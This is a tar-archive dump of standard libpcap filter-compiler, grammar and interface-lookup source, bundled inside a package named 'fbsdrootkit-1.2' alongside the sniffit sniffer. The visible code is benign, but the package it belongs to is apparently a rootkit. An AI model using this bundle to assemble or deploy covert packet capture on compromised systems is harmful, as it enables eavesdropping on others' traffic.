Q_SRC: b1 = gen_portatom(0, (long)port); break; case Q_DST: b1 = gen_portatom(2, (long)port); break; case Q_OR: case Q_DEFAULT: tmp = gen_portatom(0, (long)port); b1 = gen_portatom(2, (long)port); gen_or(tmp, b1); break; case Q_AND: tmp = gen_portatom(0, (long)port); b1 = gen_portatom(2, (long)port); gen_and(tmp, b1); break; default: abort(); } gen_and(b0, b1); return b1; } static struct block * gen_port(port, ip_proto, dir) int port; int ip_proto; int dir; { struct block *b0, *b1, *tmp; /* ether proto ip */ b0 = gen_linktype(ETHERTYPE_IP); switch (ip_proto) { case IPPROTO_UDP: case IPPROTO_TCP: b1 = gen_portop(port, ip_proto, dir); break; case PROTO_UNDEF: tmp = gen_portop(port, IPPROTO_TCP, dir); b1 = gen_portop(port, IPPROTO_UDP, dir); gen_or(tmp, b1); break; default: abort(); } gen_and(b0, b1); return b1; } static int lookup_proto(name, proto) char *name; int proto; { int v; switch (proto) { case Q_DEFAULT: case Q_IP: v = pcap_nametoproto(name); if (v == PROTO_UNDEF) bpf_error("unknown ip proto '%s'", name); break; case Q_LINK: /* XXX should look up h/w protocol type based on linktype */ v = pcap_nametoeproto(name); if (v == PROTO_UNDEF) bpf_error("unknown ether proto '%s'", name); break; default: v = PROTO_UNDEF; break; } return v; } static struct block * gen_proto(v, proto, dir) int v; int proto; int dir; { struct block *b0, *b1; if (dir != Q_DEFAULT) bpf_error("direction applied to 'proto'"); switch (proto) { case Q_DEFAULT: case Q_IP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 9, BPF_B, (long)v); gen_and(b0, b1); return b1; case Q_ARP: bpf_error("arp does not encapsulate another protocol"); /* NOTREACHED */ case Q_RARP: bpf_error("rarp does not encapsulate another protocol"); /* NOTREACHED */ case Q_DECNET: bpf_error("decnet encapsulation is not specifiable"); /* NOTREACHED */ case Q_LAT: bpf_error("lat does not encapsulate another protocol"); /* NOTREACHED */ case Q_MOPRC: bpf_error("moprc does not encapsulate another protocol"); /* NOTREACHED */ case Q_MOPDL: bpf_error("mopdl does not encapsulate another protocol"); /* NOTREACHED */ case Q_LINK: return gen_linktype(v); case Q_UDP: bpf_error("'udp proto' is bogus"); /* NOTREACHED */ case Q_TCP: bpf_error("'tcp proto' is bogus"); /* NOTREACHED */ case Q_ICMP: bpf_error("'icmp proto' is bogus"); /* NOTREACHED */ default: abort(); /* NOTREACHED */ } /* NOTREACHED */ } /* * Left justify 'addr' and return its resulting network mask. */ static u_long net_mask(addr) u_long *addr; { register u_long m = 0xffffffff; if (*addr) while ((*addr & 0xff000000) == 0) *addr <<= 8, m <<= 8; return m; } struct block * gen_scode(name, q) char *name; struct qual q; { int proto = q.proto; int dir = q.dir; u_char *eaddr; u_long mask, addr, **alist; struct block *b, *tmp; int port, real_proto; switch (q.addr) { case Q_NET: addr = pcap_nametonetaddr(name); if (addr == 0) bpf_error("unknown network '%s'", name); mask = net_mask(&addr); return gen_host(addr, mask, proto, dir); case Q_DEFAULT: case Q_HOST: if (proto == Q_LINK) { switch (linktype) { case DLT_EN10MB: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown ether host '%s'", name); return gen_ehostop(eaddr, dir); #ifdef FDDI case DLT_FDDI: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown FDDI host '%s'", name); return gen_fhostop(eaddr, dir); #endif default: bpf_error("only ethernet/FDDI supports link-level host name"); break; } } else if (proto == Q_DECNET) { unsigned short dn_addr = __pcap_nametodnaddr(name); /* * I don't think DECNET hosts can be multihomed, so * there is no need to build up a list of addresses */ return (gen_host(dn_addr, 0, proto, dir)); } else { alist = pcap_nametoaddr(name); if (alist == NULL || *alist == NULL) bpf_error("unknown host '%s'", name); b = gen_host(**alist++, 0xffffffffL, proto, dir); while (*alist) { tmp = gen_host(**alist++, 0xffffffffL, proto, dir); gen_or(b, tmp); b = tmp; } return b; } case Q_PORT: if (proto != Q_DEFAULT && proto != Q_UDP && proto != Q_TCP) bpf_error("illegal qualifier of 'port'"); if (pcap_nametoport(name, &port, &real_proto) == 0) bpf_error("unknown port '%s'", name); if (proto == Q_UDP) { if (real_proto == IPPROTO_TCP) bpf_error("port '%s' is tcp", name); else /* override PROTO_UNDEF */ real_proto = IPPROTO_UDP; } if (proto == Q_TCP) { if (real_proto == IPPROTO_UDP) bpf_error("port '%s' is udp", name); else /* override PROTO_UNDEF */ real_proto = IPPROTO_TCP; } return gen_port(port, real_proto, dir); case Q_GATEWAY: eaddr = pcap_ether_hostton(name); if (eaddr == NULL) bpf_error("unknown ether host: %s", name); alist = pcap_nametoaddr(name); if (alist == NULL || *alist == NULL) bpf_error("unknown host '%s'", name); return gen_gateway(eaddr, alist, proto, dir); case Q_PROTO: real_proto = lookup_proto(name, proto); if (real_proto >= 0) return gen_proto(real_proto, proto, dir); else bpf_error("unknown protocol: %s", name); case Q_UNDEF: syntax(); /* NOTREACHED */ } abort(); /* NOTREACHED */ } struct block * gen_ncode(v, q) u_long v; struct qual q; { u_long mask; int proto = q.proto; int dir = q.dir; switch (q.addr) { case Q_DEFAULT: case Q_HOST: case Q_NET: if (proto == Q_DECNET) return gen_host(v, 0, proto, dir); else if (proto == Q_LINK) { bpf_error("illegal link layer address"); } else { mask = net_mask(&v); return gen_host(v, mask, proto, dir); } case Q_PORT: if (proto == Q_UDP) proto = IPPROTO_UDP; else if (proto == Q_TCP) proto = IPPROTO_TCP; else if (proto == Q_DEFAULT) proto = PROTO_UNDEF; else bpf_error("illegal qualifier of 'port'"); return gen_port((int)v, proto, dir); case Q_GATEWAY: bpf_error("'gateway' requires a name"); /* NOTREACHED */ case Q_PROTO: return gen_proto((int)v, proto, dir); case Q_UNDEF: syntax(); /* NOTREACHED */ default: abort(); /* NOTREACHED */ } /* NOTREACHED */ } struct block * gen_ecode(eaddr, q) u_char *eaddr; struct qual q; { if ((q.addr == Q_HOST || q.addr == Q_DEFAULT) && q.proto == Q_LINK) { if (linktype == DLT_EN10MB) return gen_ehostop(eaddr, (int)q.dir); #ifdef FDDI if (linktype == DLT_FDDI) return gen_fhostop(eaddr, (int)q.dir); #endif } bpf_error("ethernet address used in non-ether expression"); /* NOTREACHED */ } void sappend(s0, s1) struct slist *s0, *s1; { /* * This is definitely not the best way to do this, but the * lists will rarely get long. */ while (s0->next) s0 = s0->next; s0->next = s1; } static struct slist * xfer_to_x(a) struct arth *a; { struct slist *s; s = new_stmt(BPF_LDX|BPF_MEM); s->s.k = a->regno; return s; } static struct slist * xfer_to_a(a) struct arth *a; { struct slist *s; s = new_stmt(BPF_LD|BPF_MEM); s->s.k = a->regno; return s; } struct arth * gen_load(proto, index, size) int proto; struct arth *index; int size; { struct slist *s, *tmp; struct block *b; int regno = alloc_reg(); free_reg(index->regno); switch (size) { default: bpf_error("data size must be 1, 2, or 4"); case 1: size = BPF_B; break; case 2: size = BPF_H; break; case 4: size = BPF_W; break; } switch (proto) { default: bpf_error("unsupported index operation"); case Q_LINK: s = xfer_to_x(index); tmp = new_stmt(BPF_LD|BPF_IND|size); sappend(s, tmp); sappend(index->s, s); break; case Q_IP: case Q_ARP: case Q_RARP: case Q_DECNET: case Q_LAT: case Q_MOPRC: case Q_MOPDL: /* XXX Note that we assume a fixed link link header here. */ s = xfer_to_x(index); tmp = new_stmt(BPF_LD|BPF_IND|size); tmp->s.k = off_nl; sappend(s, tmp); sappend(index->s, s); b = gen_proto_abbrev(proto); if (index->b) gen_and(index->b, b); index->b = b; break; case Q_TCP: case Q_UDP: case Q_ICMP: s = new_stmt(BPF_LDX|BPF_MSH|BPF_B); s->s.k = off_nl; sappend(s, xfer_to_a(index)); sappend(s, new_stmt(BPF_ALU|BPF_ADD|BPF_X)); sappend(s, new_stmt(BPF_MISC|BPF_TAX)); sappend(s, tmp = new_stmt(BPF_LD|BPF_IND|size)); tmp->s.k = off_nl; sappend(index->s, s); gen_and(gen_proto_abbrev(proto), b = gen_ipfrag()); if (index->b) gen_and(index->b, b); index->b = b; break; } index->regno = regno; s = new_stmt(BPF_ST); s->s.k = regno; sappend(index->s, s); return index; } struct block * gen_relation(code, a0, a1, reversed) int code; struct arth *a0, *a1; int reversed; { struct slist *s0, *s1, *s2; struct block *b, *tmp; s0 = xfer_to_x(a1); s1 = xfer_to_a(a0); s2 = new_stmt(BPF_ALU|BPF_SUB|BPF_X); b = new_block(JMP(code)); if (reversed) gen_not(b); sappend(s1, s2); sappend(s0, s1); sappend(a1->s, s0); sappend(a0->s, a1->s); b->stmts = a0->s; free_reg(a0->regno); free_reg(a1->regno); /* 'and' together protocol checks */ if (a0->b) { if (a1->b) { gen_and(a0->b, tmp = a1->b); } else tmp = a0->b; } else tmp = a1->b; if (tmp) gen_and(tmp, b); return b; } struct arth * gen_loadlen() { int regno = alloc_reg(); struct arth *a = (struct arth *)newchunk(sizeof(*a)); struct slist *s; s = new_stmt(BPF_LD|BPF_LEN); s->next = new_stmt(BPF_ST); s->next->s.k = regno; a->s = s; a->regno = regno; return a; } struct arth * gen_loadi(val) int val; { struct arth *a; struct slist *s; int reg; a = (struct arth *)newchunk(sizeof(*a)); reg = alloc_reg(); s = new_stmt(BPF_LD|BPF_IMM); s->s.k = val; s->next = new_stmt(BPF_ST); s->next->s.k = reg; a->s = s; a->regno = reg; return a; } struct arth * gen_neg(a) struct arth *a; { struct slist *s; s = xfer_to_a(a); sappend(a->s, s); s = new_stmt(BPF_ALU|BPF_NEG); s->s.k = 0; sappend(a->s, s); s = new_stmt(BPF_ST); s->s.k = a->regno; sappend(a->s, s); return a; } struct arth * gen_arth(code, a0, a1) int code; struct arth *a0, *a1; { struct slist *s0, *s1, *s2; s0 = xfer_to_x(a1); s1 = xfer_to_a(a0); s2 = new_stmt(BPF_ALU|BPF_X|code); sappend(s1, s2); sappend(s0, s1); sappend(a1->s, s0); sappend(a0->s, a1->s); free_reg(a1->regno); s0 = new_stmt(BPF_ST); a0->regno = s0->s.k = alloc_reg(); sappend(a0->s, s0); return a0; } /* * Here we handle simple allocation of the scratch registers. * If too many registers are alloc'd, the allocator punts. */ static int regused[BPF_MEMWORDS]; static int curreg; /* * Return the next free register. */ static int alloc_reg() { int n = BPF_MEMWORDS; while (--n >= 0) { if (regused[curreg]) curreg = (curreg + 1) % BPF_MEMWORDS; else { regused[curreg] = 1; return curreg; } } bpf_error("too many registers needed to evaluate expression"); /* NOTREACHED */ } /* * Return a register to the table so it can * be used later. */ static void free_reg(n) int n; { regused[n] = 0; } static struct block * gen_len(jmp, n) int jmp, n; { struct slist *s; struct block *b; s = new_stmt(BPF_LD|BPF_LEN); s->next = new_stmt(BPF_ALU|BPF_SUB|BPF_K); s->next->s.k = n; b = new_block(JMP(jmp)); b->stmts = s; return b; } struct block * gen_greater(n) int n; { return gen_len(BPF_JGE, n); } struct block * gen_less(n) int n; { struct block *b; b = gen_len(BPF_JGT, n); gen_not(b); return b; } struct block * gen_byteop(op, idx, val) int op, idx, val; { struct block *b; struct slist *s; switch (op) { default: abort(); case '=': return gen_cmp((u_int)idx, BPF_B, (long)val); case '<': b = gen_cmp((u_int)idx, BPF_B, (long)val); b->s.code = JMP(BPF_JGE); gen_not(b); return b; case '>': b = gen_cmp((u_int)idx, BPF_B, (long)val); b->s.code = JMP(BPF_JGT); return b; case '|': s = new_stmt(BPF_ALU|BPF_OR|BPF_K); break; case '&': s = new_stmt(BPF_ALU|BPF_AND|BPF_K); break; } s->s.k = val; b = new_block(JMP(BPF_JEQ)); b->stmts = s; gen_not(b); return b; } struct block * gen_broadcast(proto) int proto; { u_long hostmask; struct block *b0, *b1, *b2; static u_char ebroadcast[] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; switch (proto) { case Q_DEFAULT: case Q_LINK: if (linktype == DLT_EN10MB) return gen_ehostop(ebroadcast, Q_DST); #ifdef FDDI if (linktype == DLT_FDDI) return gen_fhostop(ebroadcast, Q_DST); #endif bpf_error("not a broadcast link"); break; case Q_IP: b0 = gen_linktype(ETHERTYPE_IP); hostmask = ~netmask; b1 = gen_mcmp(off_nl + 16, BPF_W, (long)0, hostmask); b2 = gen_mcmp(off_nl + 16, BPF_W, (long)(~0 & hostmask), hostmask); gen_or(b1, b2); gen_and(b0, b2); return b2; } bpf_error("only ether/ip broadcast filters supported"); } struct block * gen_multicast(proto) int proto; { register struct block *b0, *b1; register struct slist *s; switch (proto) { case Q_DEFAULT: case Q_LINK: if (linktype == DLT_EN10MB) { /* ether[0] & 1 != 0 */ s = new_stmt(BPF_LD|BPF_B|BPF_ABS); s->s.k = 0; b0 = new_block(JMP(BPF_JSET)); b0->s.k = 1; b0->stmts = s; return b0; } if (linktype == DLT_FDDI) { /* XXX TEST THIS: MIGHT NOT PORT PROPERLY XXX */ /* fddi[1] & 1 != 0 */ s = new_stmt(BPF_LD|BPF_B|BPF_ABS); s->s.k = 1; b0 = new_block(JMP(BPF_JSET)); b0->s.k = 1; b0->stmts = s; return b0; } /* Link not known to support multicasts */ break; case Q_IP: b0 = gen_linktype(ETHERTYPE_IP); b1 = gen_cmp(off_nl + 16, BPF_B, (long)224); b1->s.code = JMP(BPF_JGE); gen_and(b0, b1); return b1; } bpf_error("only IP multicast filters supported on ethernet/FDDI"); } /* * generate command for inbound/outbound. It's here so we can * make it link-type specific. 'dir' = 0 implies "inbound", * = 1 implies "outbound". */ struct block * gen_inbound(dir) int dir; { register struct block *b0; b0 = gen_relation(BPF_JEQ, gen_load(Q_LINK, gen_loadi(0), 1), gen_loadi(0), dir); return (b0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/gencode.h100400 764 764 10326 6226213210 16436 0ustar dfdf/* * Copyright (c) 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * * @(#) $Header: gencode.h,v 1.20 94/06/12 14:29:30 leres Exp $ (LBL) */ /* * filter.h must be included before this file. */ /* Address qualifers. */ #define Q_HOST 1 #define Q_NET 2 #define Q_PORT 3 #define Q_GATEWAY 4 #define Q_PROTO 5 /* Protocol qualifiers. */ #define Q_LINK 1 #define Q_IP 2 #define Q_ARP 3 #define Q_RARP 4 #define Q_TCP 5 #define Q_UDP 6 #define Q_ICMP 7 #define Q_DECNET 8 #define Q_LAT 9 #define Q_MOPRC 10 #define Q_MOPDL 11 /* Directional qualifers. */ #define Q_SRC 1 #define Q_DST 2 #define Q_OR 3 #define Q_AND 4 #define Q_DEFAULT 0 #define Q_UNDEF 255 struct stmt { int code; long k; }; struct slist { struct stmt s; struct slist *next; }; /* * A bit vector to represent definition sets. We assume TOT_REGISTERS * is smaller than 8*sizeof(atomset). */ typedef u_long atomset; #define ATOMMASK(n) (1 << (n)) #define ATOMELEM(d, n) (d & ATOMMASK(n)) /* * An unbounded set. */ typedef u_long *uset; /* * Total number of atomic entities, including accumulator (A) and index (X). * We treat all these guys similarly during flow analysis. */ #define N_ATOMS (BPF_MEMWORDS+2) struct edge { int id; int code; uset edom; struct block *succ; struct block *pred; struct edge *next; /* link list of incoming edges for a node */ }; struct block { int id; struct slist *stmts; /* side effect stmts */ struct stmt s; /* branch stmt */ int mark; int level; int offset; int sense; struct edge et; struct edge ef; struct block *head; struct block *link; /* link field used by optimizer */ uset dom; uset closure; struct edge *in_edges; atomset def, kill; atomset in_use; atomset out_use; long oval; long val[N_ATOMS]; }; struct arth { struct block *b; /* protocol checks */ struct slist *s; /* stmt list */ int regno; /* virtual register number of result */ }; struct qual { unsigned char addr; unsigned char proto; unsigned char dir; unsigned char pad; }; #ifndef __GNUC__ #define volatile #endif struct arth *gen_loadi(int); struct arth *gen_load(int, struct arth *, int); struct arth *gen_loadlen(void); struct arth *gen_neg(struct arth *); struct arth *gen_arth(int, struct arth *, struct arth *); void gen_and(struct block *, struct block *); void gen_or(struct block *, struct block *); void gen_not(struct block *); struct block *gen_scode(char *, struct qual); struct block *gen_ecode(u_char *, struct qual); struct block *gen_ncode(u_long, struct qual); struct block *gen_proto_abbrev(int); struct block *gen_relation(int, struct arth *, struct arth *, int); struct block *gen_less(int); struct block *gen_greater(int); struct block *gen_byteop(int, int, int); struct block *gen_broadcast(int); struct block *gen_multicast(int); struct block *gen_inbound(int); void bpf_optimize(struct block **); volatile void bpf_error(char *, ...); void finish_parse(struct block *); char *sdup(char *); struct bpf_insn *icode_to_fcode(struct block *, int *); int pcap_parse(void); void lex_init(char *); void sappend(struct slist *, struct slist *); /* XXX */ #define JT(b) ((b)->et.succ) #define JF(b) ((b)->ef.succ) fbsdrootkit-1.2/sniffit.0.3.3/libpcap/grammar.y100400 764 764 15233 6226213210 16503 0ustar dfdf%{ /* * Copyright (c) 1988, 1989, 1990, 1991, 1992, 1993, 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that: (1) source code distributions * retain the above copyright notice and this paragraph in its entirety, (2) * distributions including binary code include the above copyright notice and * this paragraph in its entirety in the documentation or other materials * provided with the distribution, and (3) all advertising materials mentioning * features or use of this software display the following acknowledgement: * ``This product includes software developed by the University of California, * Lawrence Berkeley Laboratory and its contributors.'' Neither the name of * the University nor the names of its contributors may be used to endorse * or promote products derived from this software without specific prior * written permission. * THIS SOFTWARE IS PROVIDED ``AS IS'' AND WITHOUT ANY EXPRESS OR IMPLIED * WARRANTIES, INCLUDING, WITHOUT LIMITATION, THE IMPLIED WARRANTIES OF * MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. * */ #ifndef lint static char rcsid[] = "@(#) $Header: grammar.y,v 1.39 94/06/14 20:09:25 leres Exp $ (LBL)"; #endif #include #include #include #include #include #include #include #include #include #include #include "gencode.h" #define QSET(q, p, d, a) (q).proto = (p),\ (q).dir = (d),\ (q).addr = (a) int n_errors = 0; static struct qual qerr = { Q_UNDEF, Q_UNDEF, Q_UNDEF, Q_UNDEF }; static void yyerror(char *msg) { ++n_errors; bpf_error(msg); /* NOTREACHED */ } #ifndef YYBISON pcap_parse() { return (yyparse()); } #endif %} %union { int i; u_long h; u_char *e; char *s; struct stmt *stmt; struct arth *a; struct { struct qual q; struct block *b; } blk; struct block *rblk; } %type expr id nid pid term rterm qid %type head %type pqual dqual aqual ndaqual %type arth narth %type byteop pname pnum relop irelop %type and or paren not null prog %type other %token DST SRC HOST GATEWAY %token NET PORT LESS GREATER PROTO BYTE %token ARP RARP IP TCP UDP ICMP %token DECNET LAT MOPRC MOPDL %token TK_BROADCAST TK_MULTICAST %token NUM INBOUND OUTBOUND %token LINK %token GEQ LEQ NEQ %token ID EID HID %token LSH RSH %token LEN %type ID %type EID %type HID %type NUM %left OR AND %nonassoc '!' %left '|' %left '&' %left LSH RSH %left '+' '-' %left '*' '/' %nonassoc UMINUS %% prog: null expr { finish_parse($2.b); } | null ; null: /* null */ { $$.q = qerr; } ; expr: term | expr and term { gen_and($1.b, $3.b); $$ = $3; } | expr and id { gen_and($1.b, $3.b); $$ = $3; } | expr or term { gen_or($1.b, $3.b); $$ = $3; } | expr or id { gen_or($1.b, $3.b); $$ = $3; } ; and: AND { $$ = $0; } ; or: OR { $$ = $0; } ; id: nid | pnum { $$.b = gen_ncode((u_long)$1, $$.q = $0.q); } | paren pid ')' { $$ = $2; } ; nid: ID { $$.b = gen_scode($1, $$.q = $0.q); } | HID { /* Decide how to parse HID based on proto */ $$.q = $0.q; switch ($$.q.proto) { case Q_DECNET: $$.b = gen_ncode(__pcap_atodn((char *)$1), $$.q); break; default: $$.b = gen_ncode(__pcap_atoin((char *)$1), $$.q); break; } } | EID { $$.b = gen_ecode($1, $$.q = $0.q); } | not id { gen_not($2.b); $$ = $2; } ; not: '!' { $$ = $0; } ; paren: '(' { $$ = $0; } ; pid: nid | qid and id { gen_and($1.b, $3.b); $$ = $3; } | qid or id { gen_or($1.b, $3.b); $$ = $3; } ; qid: pnum { $$.b = gen_ncode((u_long)$1, $$.q = $0.q); } | pid ; term: rterm | not term { gen_not($2.b); $$ = $2; } ; head: pqual dqual aqual { QSET($$.q, $1, $2, $3); } | pqual dqual { QSET($$.q, $1, $2, Q_DEFAULT); } | pqual aqual { QSET($$.q, $1, Q_DEFAULT, $2); } | pqual PROTO { QSET($$.q, $1, Q_DEFAULT, Q_PROTO); } | pqual ndaqual { QSET($$.q, $1, Q_DEFAULT, $2); } ; rterm: head id { $$ = $2; } | paren expr ')' { $$.b = $2.b; $$.q = $1.q; } | pname { $$.b = gen_proto_abbrev($1); $$.q = qerr; } | arth relop arth { $$.b = gen_relation($2, $1, $3, 0); $$.q = qerr; } | arth irelop arth { $$.b = gen_relation($2, $1, $3, 1); $$.q = qerr; } | other { $$.b = $1; $$.q = qerr; } ; /* protocol level qualifiers */ pqual: pname | { $$ = Q_DEFAULT; } ; /* 'direction' qualifiers */ dqual: SRC { $$ = Q_SRC; } | DST { $$ = Q_DST; } | SRC OR DST { $$ = Q_OR; } | DST OR SRC { $$ = Q_OR; } | SRC AND DST { $$ = Q_AND; } | DST AND SRC { $$ = Q_AND; } ; /* address type qualifiers */ aqual: HOST { $$ = Q_HOST; } | NET { $$ = Q_NET; } | PORT { $$ = Q_PORT; } ; /* non-directional address type qualifiers */ ndaqual: GATEWAY { $$ = Q_GATEWAY; } ; pname: LINK { $$ = Q_LINK; } | IP { $$ = Q_IP; } | ARP { $$ = Q_ARP; } | RARP { $$ = Q_RARP; } | TCP { $$ = Q_TCP; } | UDP { $$ = Q_UDP; } | ICMP { $$ = Q_ICMP; } | DECNET { $$ = Q_DECNET; } | LAT { $$ = Q_LAT; } | MOPDL { $$ = Q_MOPDL; } | MOPRC { $$ = Q_MOPRC; } ; other: pqual TK_BROADCAST { $$ = gen_broadcast($1); } | pqual TK_MULTICAST { $$ = gen_multicast($1); } | LESS NUM { $$ = gen_less($2); } | GREATER NUM { $$ = gen_greater($2); } | BYTE NUM byteop NUM { $$ = gen_byteop($3, $2, $4); } | INBOUND { $$ = gen_inbound(0); } | OUTBOUND { $$ = gen_inbound(1); } ; relop: '>' { $$ = BPF_JGT; } | GEQ { $$ = BPF_JGE; } | '=' { $$ = BPF_JEQ; } ; irelop: LEQ { $$ = BPF_JGT; } | '<' { $$ = BPF_JGE; } | NEQ { $$ = BPF_JEQ; } ; arth: pnum { $$ = gen_loadi($1); } | narth ; narth: pname '[' arth ']' { $$ = gen_load($1, $3, 1); } | pname '[' arth ':' NUM ']' { $$ = gen_load($1, $3, $5); } | arth '+' arth { $$ = gen_arth(BPF_ADD, $1, $3); } | arth '-' arth { $$ = gen_arth(BPF_SUB, $1, $3); } | arth '*' arth { $$ = gen_arth(BPF_MUL, $1, $3); } | arth '/' arth { $$ = gen_arth(BPF_DIV, $1, $3); } | arth '&' arth { $$ = gen_arth(BPF_AND, $1, $3); } | arth '|' arth { $$ = gen_arth(BPF_OR, $1, $3); } | arth LSH arth { $$ = gen_arth(BPF_LSH, $1, $3); } | arth RSH arth { $$ = gen_arth(BPF_RSH, $1, $3); } | '-' arth %prec UMINUS { $$ = gen_neg($2); } | paren narth ')' { $$ = $2; } | LEN { $$ = gen_loadlen(); } ; byteop: '&' { $$ = '&'; } | '|' { $$ = '|'; } | '<' { $$ = '<'; } | '>' { $$ = '>'; } | '=' { $$ = '='; } ; pnum: NUM | paren pnum ')' { $$ = $2; } ; %% fbsdrootkit-1.2/sniffit.0.3.3/libpcap/inet.c100400 764 764 13243 6226213210 15765 0ustar dfdf/* * Copyright (c) 1994 * The Regents of the University of California. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * This product includes software developed by the Computer Systems * Engineering Group at Lawrence Berkeley Laboratory. * 4. Neither the name of the University nor of the Laboratory may be used * to endorse or promote products derived from this software without * specific prior written permission. * * THIS SOFTWARE IS PROVIDED BY THE REGENTS AND CONTRIBUTORS ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE REGENTS OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. */ #ifndef lint static char rcsid[] = "@(#) $Header: inet.c,v 1.4 94/06/07 01:16:50 leres Exp $ (LBL)"; #endif #include #include #include #include #ifdef SOLARIS #include #endif #include #include #include #include #include #include #include #include #include /* Not all systems have IFF_LOOPBACK */ #ifdef IFF_LOOPBACK #define ISLOOPBACK(p) ((p)->ifr_flags & IFF_LOOPBACK) #else #define ISLOOPBACK(p) (strcmp((p)->ifr_name, "lo0") == 0) #endif /* * Return the name of a network interface attached to the system, or NULL * if none can be found. The interface must be configured up; the * lowest unit number is preferred; loopback is ignored. */ char * pcap_lookupdev(errbuf) register char *errbuf; { register int fd, minunit, n; register char *cp; register struct ifreq *ifrp, *ifend, *ifnext, *mp; struct ifconf ifc; struct ifreq ibuf[16], ifr; static char device[sizeof(ifrp->ifr_name) + 1]; fd = socket(AF_INET, SOCK_DGRAM, 0); if (fd < 0) { (void)sprintf(errbuf, "socket: %s", pcap_strerror(errno)); return (NULL); } ifc.ifc_len = sizeof ibuf; ifc.ifc_buf = (caddr_t)ibuf; if (ioctl(fd, SIOCGIFCONF, (char *)&ifc) < 0 || ifc.ifc_len < sizeof(struct ifreq)) { (void)sprintf(errbuf, "SIOCGIFCONF: %s", pcap_strerror(errno)); (void)close(fd); return (NULL); } ifrp = ibuf; ifend = (struct ifreq *)((char *)ibuf + ifc.ifc_len); mp = NULL; minunit = 666; for (; ifrp < ifend; ifrp = ifnext) { #if BSD - 0 >= 199006 n = ifrp->ifr_addr.sa_len + sizeof(ifrp->ifr_name); if (n < sizeof(*ifrp)) ifnext = ifrp + 1; else ifnext = (struct ifreq *)((char *)ifrp + n); if (ifrp->ifr_addr.sa_family != AF_INET) continue; #else ifnext = ifrp + 1; #endif /* * Need a template to preserve address info that is * used below to locate the next entry. (Otherwise, * SIOCGIFFLAGS stomps over it because the requests * are returned in a union.) */ strncpy(ifr.ifr_name, ifrp->ifr_name, sizeof(ifr.ifr_name)); if (ioctl(fd, SIOCGIFFLAGS, (char *)&ifr) < 0) { (void)sprintf(errbuf, "SIOCGIFFLAGS: %s", pcap_strerror(errno)); (void)close(fd); return (NULL); } /* Must be up and not the loopback */ if ((ifr.ifr_flags & IFF_UP) == 0 || ISLOOPBACK(&ifr)) continue; for (cp = ifrp->ifr_name; !isdigit(*cp); ++cp) continue; n = atoi(cp); if (n < minunit) { minunit = n; mp = ifrp; } } (void)close(fd); if (mp == NULL) { (void)strcpy(errbuf, "no suitable device found"); return (NULL); } (void)strncpy(device, mp->ifr_name, sizeof(device) - 1); device[sizeof(device) - 1] = '\0'; return (device); } int pcap_lookupnet(device, netp, maskp, errbuf) register char *device; register u_long *netp, *maskp; register char *errbuf; { register int fd; register struct sockaddr_in *sin; struct ifreq ifr; fd = socket(AF_INET, SOCK_DGRAM, 0); if (fd < 0) { (void)sprintf(errbuf, "socket: %s", pcap_strerror(errno)); return (-1); } (void)strncpy(ifr.ifr_name, device, sizeof(ifr.ifr_name)); if (ioctl(fd, SIOCGIFADDR, (char *)&ifr) < 0) { (void)sprintf(errbuf, "SIOCGIFADDR: %s: %s", device, pcap_strerror(errno)); (void)close(fd); return (-1); } sin = (struct sockaddr_in *)&ifr.ifr_addr; *netp = sin->sin_addr.s_addr; if (ioctl(fd, SIOCGIFNETMASK, (char *)&ifr) < 0) { (void)sprintf(errbuf, "SIOCGIFNETMASK: %s: %s", device, pcap_strerror(errno)); (void)close(fd); return (-1); } (void)close(fd); *maskp = sin->sin_addr.s_addr; if (*maskp == 0) { if (IN_CLASSA(*netp)) *maskp = IN_CLASSA_NET; else if (IN_CLASSB(*netp)) *maskp = IN_CLASSB_NET; else if (IN_CLASSC(*netp)) *maskp = IN_CLASSC_NET; else { (void)sprintf(errbuf, "inet class for 0x%x unknown", *netp); return (-1); } } *netp &= *maskp; return (0); } fbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/ 40700 764 764 0 6226213210 17322 5ustar dfdffbsdrootkit-1.2/sniffit.0.3.3/libpcap/linux-include/protocols/ 40700 764 764 0 6226213210 21346 5ustar 